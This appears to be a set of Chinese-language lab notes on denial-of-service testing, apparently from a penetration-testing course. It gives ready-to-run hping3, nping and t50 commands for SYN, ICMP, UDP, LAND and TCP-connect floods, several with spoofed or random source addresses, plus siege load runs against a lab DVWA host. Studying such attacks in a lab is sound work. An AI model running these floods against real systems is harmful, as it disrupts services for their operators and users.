1、RUDY
- 慢速应用层http post攻击,与slowhttptest原理相同
- 每次只传输一个字节的数据
- 攻击有表单web页面,攻击时需指定攻击的参数名称
2、Hping3
- 可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
Syn Flood攻击
# hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.50.183
靶机使用tcpdump -i eth0 -s 0 -vv查看
靶机抓包
ICMP Flood攻击
# hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.50.183
UDP Flood攻击
# hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 192.168.50.183
3、LAND攻击
- 特殊种类的syn flood攻击
- 源地址、目的地址都是受害者,受害者于自己完成三次握手
# hping3 -a 192.168.50.183 -S -d -p 22 --flood 192.168.50.183
4、TCP全连接DoS攻击
# nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.50.183
再次刷新访问tcp的80端口,无法正常显示
刷新无法显示
5、查公网IP
nping --echo-client "public" echo.nmap.org --udp
6、Siege压力测试
- http/https压力测试工具,模拟多个用户并发访问请求
-
# siege -g http://192.168.50.183查看banner基本信息
siege -i -c 100 http://192.168.50.183/dvwa/login.php -A httttttptest -vv
攻击结果
使用定义的useragent
- 同时统计多个url,使用-f调用字典文件
/etc/siege/urls.txt,随后直接使用siege -i -c 100 -vv
7、T50网络压力测试
# t50 192.168.50.183 --flood --turbo -S --protocol TCP --dport 22
